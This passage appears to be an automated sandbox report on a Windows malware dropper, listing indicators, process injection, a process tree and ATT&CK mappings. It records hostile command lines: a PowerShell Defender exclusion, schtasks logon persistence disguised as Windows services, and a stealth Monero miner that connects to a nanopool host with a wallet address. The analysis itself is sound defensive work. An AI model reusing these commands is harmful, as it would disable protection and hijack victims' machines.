f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Sun14c031e6f3d78.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	services64.exe

NTFS ADS 4 IoCs

Processes:

explorer.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\o55o75gcq_1.exe:1BB7FB68	explorer.exe
File created	C:\Users\Admin\AppData\Local\Temp\o55o75gcq_1.exe:1BB7FB68	explorer.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\"C:\Users\Admin\AppData\Roaming\services64.exe"	explorer.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\"C:\Users\Admin\AppData\Roaming\0f76efcb.lnk	explorer.exe

Runs regedit.exe 1 IoCs

Processes:

regedit.exe

pid process

2244 regedit.exe

pid	process
2244	regedit.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Sun14eb4b7c17.exepowershell.exeExplorer.EXE

pid	process
2620	Sun14eb4b7c17.exe
2620	Sun14eb4b7c17.exe
2840	powershell.exe
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE
1196	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

setup_2.tmp

pid process

2748 setup_2.tmp
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

464

pid	process
2748	setup_2.tmp

pid	process
464

Suspicious behavior: MapViewOfSection 35 IoCs

Processes:

Sun14eb4b7c17.exeABC9.exeexplorer.exeo55o75gcq_1.exe

pid	process
2620	Sun14eb4b7c17.exe
588	ABC9.exe
588	ABC9.exe
1336	explorer.exe
1336	explorer.exe
1336	explorer.exe
1336	explorer.exe
1336	explorer.exe
1336	explorer.exe
1336	explorer.exe
1336	explorer.exe
1336	explorer.exe
1336	explorer.exe
1336	explorer.exe
1336	explorer.exe
1336	explorer.exe
1336	explorer.exe
1336	explorer.exe
1336	explorer.exe
1336	explorer.exe
1336	explorer.exe
1336	explorer.exe
1336	explorer.exe
1336	explorer.exe
1336	explorer.exe
1336	explorer.exe
1336	explorer.exe
1336	explorer.exe
1336	explorer.exe
1336	explorer.exe
1336	explorer.exe
2908	o55o75gcq_1.exe
2908	o55o75gcq_1.exe
1336	explorer.exe
1336	explorer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

2.exeSun14d2ba445ad3.exePBrowFile594.exepowershell.exeABC9.exeexplorer.exeExplorer.EXEChrome 5.exeo55o75gcq_1.exeregedit.exe

description	pid	process
Token: SeDebugPrivilege	2088	2.exe
Token: SeDebugPrivilege	2880	Sun14d2ba445ad3.exe
Token: SeDebugPrivilege	2816	PBrowFile594.exe
Token: SeDebugPrivilege	2840	powershell.exe
Token: SeDebugPrivilege	588	ABC9.exe
Token: SeRestorePrivilege	588	ABC9.exe
Token: SeBackupPrivilege	588	ABC9.exe
Token: SeLoadDriverPrivilege	588	ABC9.exe
Token: SeCreatePagefilePrivilege	588	ABC9.exe
Token: SeShutdownPrivilege	588	ABC9.exe
Token: SeTakeOwnershipPrivilege	588	ABC9.exe
Token: SeChangeNotifyPrivilege	588	ABC9.exe
Token: SeCreateTokenPrivilege	588	ABC9.exe
Token: SeMachineAccountPrivilege	588	ABC9.exe
Token: SeSecurityPrivilege	588	ABC9.exe
Token: SeAssignPrimaryTokenPrivilege	588	ABC9.exe
Token: SeCreateGlobalPrivilege	588	ABC9.exe
Token: 33	588	ABC9.exe
Token: SeDebugPrivilege	1336	explorer.exe
Token: SeRestorePrivilege	1336	explorer.exe
Token: SeBackupPrivilege	1336	explorer.exe
Token: SeLoadDriverPrivilege	1336	explorer.exe
Token: SeCreatePagefilePrivilege	1336	explorer.exe
Token: SeShutdownPrivilege	1336	explorer.exe
Token: SeTakeOwnershipPrivilege	1336	explorer.exe
Token: SeChangeNotifyPrivilege	1336	explorer.exe
Token: SeCreateTokenPrivilege	1336	explorer.exe
Token: SeMachineAccountPrivilege	1336	explorer.exe
Token: SeSecurityPrivilege	1336	explorer.exe
Token: SeAssignPrimaryTokenPrivilege	1336	explorer.exe
Token: SeCreateGlobalPrivilege	1336	explorer.exe
Token: 33	1336	explorer.exe
Token: SeShutdownPrivilege	1196	Explorer.EXE
Token: SeShutdownPrivilege	1196	Explorer.EXE
Token: SeDebugPrivilege	2272	Chrome 5.exe
Token: SeShutdownPrivilege	1196	Explorer.EXE
Token: SeShutdownPrivilege	1196	Explorer.EXE
Token: SeDebugPrivilege	2908	o55o75gcq_1.exe
Token: SeRestorePrivilege	2908	o55o75gcq_1.exe
Token: SeBackupPrivilege	2908	o55o75gcq_1.exe
Token: SeLoadDriverPrivilege	2908	o55o75gcq_1.exe
Token: SeCreatePagefilePrivilege	2908	o55o75gcq_1.exe
Token: SeShutdownPrivilege	2908	o55o75gcq_1.exe
Token: SeTakeOwnershipPrivilege	2908	o55o75gcq_1.exe
Token: SeChangeNotifyPrivilege	2908	o55o75gcq_1.exe
Token: SeCreateTokenPrivilege	2908	o55o75gcq_1.exe
Token: SeMachineAccountPrivilege	2908	o55o75gcq_1.exe
Token: SeSecurityPrivilege	2908	o55o75gcq_1.exe
Token: SeAssignPrimaryTokenPrivilege	2908	o55o75gcq_1.exe
Token: SeCreateGlobalPrivilege	2908	o55o75gcq_1.exe
Token: 33	2908	o55o75gcq_1.exe
Token: SeCreatePagefilePrivilege	2908	o55o75gcq_1.exe
Token: SeCreatePagefilePrivilege	2908	o55o75gcq_1.exe
Token: SeCreatePagefilePrivilege	2908	o55o75gcq_1.exe
Token: SeCreatePagefilePrivilege	2908	o55o75gcq_1.exe
Token: SeCreatePagefilePrivilege	2908	o55o75gcq_1.exe
Token: SeDebugPrivilege	2244	regedit.exe
Token: SeRestorePrivilege	2244	regedit.exe
Token: SeBackupPrivilege	2244	regedit.exe
Token: SeLoadDriverPrivilege	2244	regedit.exe
Token: SeCreatePagefilePrivilege	2244	regedit.exe
Token: SeShutdownPrivilege	2244	regedit.exe
Token: SeTakeOwnershipPrivilege	2244	regedit.exe
Token: SeChangeNotifyPrivilege	2244	regedit.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

Explorer.EXE

pid process

1196 Explorer.EXE
1196 Explorer.EXE
Suspicious use of SendNotifyMessage 2 IoCs

Processes:

Explorer.EXE

pid process

1196 Explorer.EXE
1196 Explorer.EXE

pid	process
1196	Explorer.EXE
1196	Explorer.EXE

pid	process
1196	Explorer.EXE
1196	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

720ac82bbf6ae7c41ea0630be8a40710.exesetup_installer.exesetup_install.exe

description	pid	process	target process
PID 2008 wrote to memory of 2460	2008	720ac82bbf6ae7c41ea0630be8a40710.exe	setup_installer.exe
PID 2008 wrote to memory of 2460	2008	720ac82bbf6ae7c41ea0630be8a40710.exe	setup_installer.exe
PID 2008 wrote to memory of 2460	2008	720ac82bbf6ae7c41ea0630be8a40710.exe	setup_installer.exe
PID 2008 wrote to memory of 2460	2008	720ac82bbf6ae7c41ea0630be8a40710.exe	setup_installer.exe
PID 2008 wrote to memory of 2460	2008	720ac82bbf6ae7c41ea0630be8a40710.exe	setup_installer.exe
PID 2008 wrote to memory of 2460	2008	720ac82bbf6ae7c41ea0630be8a40710.exe	setup_installer.exe
PID 2008 wrote to memory of 2460	2008	720ac82bbf6ae7c41ea0630be8a40710.exe	setup_installer.exe
PID 2460 wrote to memory of 2808	2460	setup_installer.exe	setup_install.exe
PID 2460 wrote to memory of 2808	2460	setup_installer.exe	setup_install.exe
PID 2460 wrote to memory of 2808	2460	setup_installer.exe	setup_install.exe
PID 2460 wrote to memory of 2808	2460	setup_installer.exe	setup_install.exe
PID 2460 wrote to memory of 2808	2460	setup_installer.exe	setup_install.exe
PID 2460 wrote to memory of 2808	2460	setup_installer.exe	setup_install.exe
PID 2460 wrote to memory of 2808	2460	setup_installer.exe	setup_install.exe
PID 2808 wrote to memory of 2212	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 2212	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 2212	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 2212	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 2212	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 2212	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 2212	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 2196	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 2196	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 2196	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 2196	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 2196	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 2196	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 2196	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 2508	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 2508	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 2508	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 2508	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 2508	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 2508	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 2508	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 1540	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 1540	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 1540	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 1540	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 1540	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 1540	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 1540	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 524	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 524	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 524	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 524	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 524	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 524	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 524	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 676	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 676	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 676	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 676	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 676	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 676	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 676	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 760	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 760	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 760	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 760	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 760	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 760	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 760	2808	setup_install.exe	cmd.exe
PID 2808 wrote to memory of 1272	2808	setup_install.exe	cmd.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1196
- C:\Users\Admin\AppData\Local\Temp\720ac82bbf6ae7c41ea0630be8a40710.exe
  "C:\Users\Admin\AppData\Local\Temp\720ac82bbf6ae7c41ea0630be8a40710.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2008
- - C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
    3⤵
    - Looks for VMWare services registry key.
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks whether UAC is enabled
    - Maps connected drives based on registry
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of WriteProcessMemory
    PID:2460
  - - C:\Users\Admin\AppData\Local\Temp\7zSC9932946\setup_install.exe
      "C:\Users\Admin\AppData\Local\Temp\7zSC9932946\setup_install.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:2808
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        
        PID:2212
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2840
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun1410432520b.exe
        5⤵
        Loads dropped DLL
        
        PID:676
      - C:\Users\Admin\AppData\Local\Temp\7zSC9932946\Sun1410432520b.exe
        
        Sun1410432520b.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:856
        
        C:\Users\Admin\AppData\Local\Temp\is-L427U.tmp\Sun1410432520b.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-L427U.tmp\Sun1410432520b.tmp" /SL5="$6011E,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSC9932946\Sun1410432520b.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2220
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun1479047a006c5.exe
        5⤵
        Loads dropped DLL
        
        PID:2600
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun14d2ba445ad3.exe
        5⤵
        Loads dropped DLL
        
        PID:1272
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun14c78e5159b8.exe
        5⤵
        Loads dropped DLL
        
        PID:760
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun14c031e6f3d78.exe
        5⤵
        Loads dropped DLL
        
        PID:524
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun14115415e7a48116.exe
        5⤵
        Loads dropped DLL
        
        PID:1540
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun14eb4b7c17.exe
        5⤵
        Loads dropped DLL
        
        PID:2508
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun1477d99f5afb5a49.exe
        5⤵
        Loads dropped DLL
        
        PID:2196
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2808 -s 428
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:2348
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2348 -s 632
        6⤵
        Program crash
        
        PID:1072
- C:\Users\Admin\AppData\Local\Temp\ABC9.exe
  C:\Users\Admin\AppData\Local\Temp\ABC9.exe
  2⤵
  - Sets file execution options in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Checks processor information in registry
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  PID:588
- - C:\Windows\SysWOW64\explorer.exe
    C:\Windows\SysWOW64\explorer.exe
    3⤵
    - Modifies firewall policy service
    - Sets file execution options in registry
    - Checks BIOS information in registry
    - Adds Run key to start application
    - Drops desktop.ini file(s)
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Checks processor information in registry
    - Enumerates system info in registry
    - Modifies Internet Explorer Protected Mode
    - Modifies Internet Explorer Protected Mode Banner
    - Modifies Internet Explorer settings
    - NTFS ADS
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    PID:1336
  - - C:\Users\Admin\AppData\Local\Temp\o55o75gcq_1.exe
      /suac
      4⤵
      Modifies firewall policy service
      Sets file execution options in registry
      Executes dropped EXE
      Checks for any installed AV software in registry
      Checks whether UAC is enabled
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Checks processor information in registry
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      PID:2908
    - - C:\Windows\SysWOW64\regedit.exe
        
        "C:\Windows\SysWOW64\regedit.exe"
        5⤵
        Modifies security service
        Sets file execution options in registry
        Sets service image path in registry
        Runs regedit.exe
        Suspicious use of AdjustPrivilegeToken
        
        PID:2244
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /CREATE /SC ONLOGON /TN "Windows Update Check - 0x1BB70478" /TR "C:\PROGRA~3\JAVAUP~1\O55O75~1.EXE" /RL HIGHEST
        5⤵
        Creates scheduled task(s)
        
        PID:2436
- C:\Users\Admin\AppData\Local\Temp\B839.exe
  C:\Users\Admin\AppData\Local\Temp\B839.exe
  2⤵
  - Executes dropped EXE
  PID:680

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
PID:1144

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2480

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-759560948-13949099431938739070-662912317218288515-1907576775-20270341271796949413"
1⤵
PID:2184

C:\Users\Admin\AppData\Local\Temp\7zSC9932946\Sun14eb4b7c17.exe
Sun14eb4b7c17.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2620

C:\Users\Admin\AppData\Local\Temp\7zSC9932946\Sun14d2ba445ad3.exe
Sun14d2ba445ad3.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2880

C:\Users\Admin\AppData\Local\Temp\7zSC9932946\Sun14115415e7a48116.exe
Sun14115415e7a48116.exe
1⤵
- Executes dropped EXE
PID:1608

C:\Users\Admin\AppData\Local\Temp\7zSC9932946\Sun14c78e5159b8.exe
Sun14c78e5159b8.exe
1⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1616

C:\Users\Admin\AppData\Local\Temp\7zSC9932946\Sun1479047a006c5.exe
Sun1479047a006c5.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1860
- C:\Users\Admin\AppData\Local\Temp\PBrowFile594.exe
  "C:\Users\Admin\AppData\Local\Temp\PBrowFile594.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2816
- C:\Users\Admin\AppData\Local\Temp\2.exe
  "C:\Users\Admin\AppData\Local\Temp\2.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2088
- C:\Users\Admin\AppData\Local\Temp\setup.exe
  "C:\Users\Admin\AppData\Local\Temp\setup.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:2208
- C:\Users\Admin\AppData\Local\Temp\3002.exe
  "C:\Users\Admin\AppData\Local\Temp\3002.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:2392
- - C:\Users\Admin\AppData\Local\Temp\3002.exe
    "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
    3⤵
    - Looks for VMWare services registry key.
    - Executes dropped EXE
    - Loads dropped DLL
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Maps connected drives based on registry
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:2968
- C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
  "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
  2⤵
  - Executes dropped EXE
  PID:2972
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 1104
  2⤵
  - Program crash
  PID:2536
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2536 -s 624
    3⤵
    - Program crash
    PID:1700
- C:\Users\Admin\AppData\Local\Temp\setup_2.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:824
- C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
  "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2272
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
    3⤵
    PID:864
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
      4⤵
      Creates scheduled task(s)
      PID:2256
- - C:\Users\Admin\AppData\Roaming\services64.exe
    "C:\Users\Admin\AppData\Roaming\services64.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Modifies system certificate store
    PID:2792
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
      4⤵
      PID:2916
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        5⤵
        Creates scheduled task(s)
        
        PID:2284
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
      4⤵
      Executes dropped EXE
      PID:2124
  - - C:\Windows\explorer.exe
      C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
      4⤵
      PID:1592

C:\Users\Admin\AppData\Local\Temp\7zSC9932946\Sun14c031e6f3d78.exe
Sun14c031e6f3d78.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:2148
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2148 -s 968
  2⤵
  - Program crash
  PID:872

C:\Users\Admin\AppData\Local\Temp\7zSC9932946\Sun1477d99f5afb5a49.exe
Sun1477d99f5afb5a49.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2860
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2860 -s 584
  2⤵
  - Program crash
  PID:2280

C:\Users\Admin\AppData\Local\Temp\is-GIOVL.tmp\setup_2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GIOVL.tmp\setup_2.tmp" /SL5="$50182,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
1⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: GetForegroundWindowSpam
PID:2748

C:\Users\Admin\AppData\Local\Temp\setup_2.exe
"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
1⤵
- Executes dropped EXE
PID:1672

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-904213316-16078305991472140374-7348706162072658299156657011310616616612107677069"
1⤵
PID:2004

C:\Users\Admin\AppData\Local\Temp\is-URK33.tmp\setup_2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-URK33.tmp\setup_2.tmp" /SL5="$50172,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2960

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

Software Discovery

T1518

Security Software Discovery

T1518.001

System Information Discovery